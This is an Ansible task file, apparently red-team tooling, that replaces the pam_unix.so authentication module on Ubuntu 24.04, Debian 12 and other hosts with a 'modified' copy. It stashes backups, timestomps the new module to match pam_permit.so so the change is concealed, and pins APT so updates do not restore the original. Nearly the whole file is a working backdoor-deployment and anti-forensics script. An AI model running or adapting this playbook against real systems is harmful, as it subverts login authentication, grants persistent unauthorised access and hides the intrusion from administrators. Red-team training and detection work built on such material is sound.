---
- name: Gather OS facts
  ansible.builtin.setup:
    gather_subset:
      - '!all'
      - '!min'
      - distribution

- name: Set distro-specific file path for Ubuntu 24.04
  ansible.builtin.set_fact:
    pam_file_src: "ubuntu-24.04/pam_unix_ubuntu24.so"
  when: 
    - ansible_distribution == "Ubuntu"
    - ansible_distribution_version == "24.04"

- name: Set distro-specific file path for Debian 12
  ansible.builtin.set_fact:
    pam_file_src: "debian-12/pam_unix_debian12.so"
  when:
    - ansible_distribution == "Debian"
    - ansible_distribution_major_version == "12"

- name: Set generic file path for other distros
  ansible.builtin.set_fact:
    pam_file_src: "pam_unix_deb.so"
  when: pam_file_src is not defined

- name: Check if deploy has been run before and backup exists
  ansible.builtin.stat:
    path: /usr/lib/pam.d/pam_unix.so
  register: mod_exist

- name: Backup old pam_unix.so
  ansible.builtin.copy:
    src: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    dest: /usr/lib/pam.d/
    remote_src: yes
  when: not mod_exist.stat.exists

- name: Copy over modified pam_unix.so
  ansible.builtin.copy:
    src: "{{ pam_file_src }}"
    dest: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    owner: root
    group: root
    mode: 0644
  check_mode: false

- name: Create backup backup file directory
  ansible.builtin.file:
    path: /var/lib/security
    state: directory

- name: Copy over modified file to backup backup directory
  ansible.builtin.copy:
    src: "{{ pam_file_src }}"
    dest: /var/lib/security/pam_unix.so
    owner: root
    group: root
    mode: 0644

- name: Get timestamps of other PAM modules
  ansible.builtin.stat:
    path: /usr/lib/x86_64-linux-gnu/security/pam_permit.so
  register: pam_stat

- name: Timestomp new pam_unix.so
  ansible.builtin.file:
    path: /usr/lib/x86_64-linux-gnu/security/pam_unix.so
    modification_time: '{{ pam_mod_time }}'
    access_time: '{{ pam_access_time }}'
  vars:
    pam_mod_time: '{{ "%Y%m%d%H%M.%S" | strftime(pam_stat.stat.mtime) }}'
    pam_access_time: '{{ "%Y%m%d%H%M.%S" | strftime(pam_stat.stat.atime) }}'

- name: Add exclusion to APT to prevent reinstall of PAM
  ansible.builtin.copy:
    src: "libpam-apt-pin"
    dest: /etc/apt/preferences.d/libpam-apt-pin
    owner: root
    group: root
    mode: 0644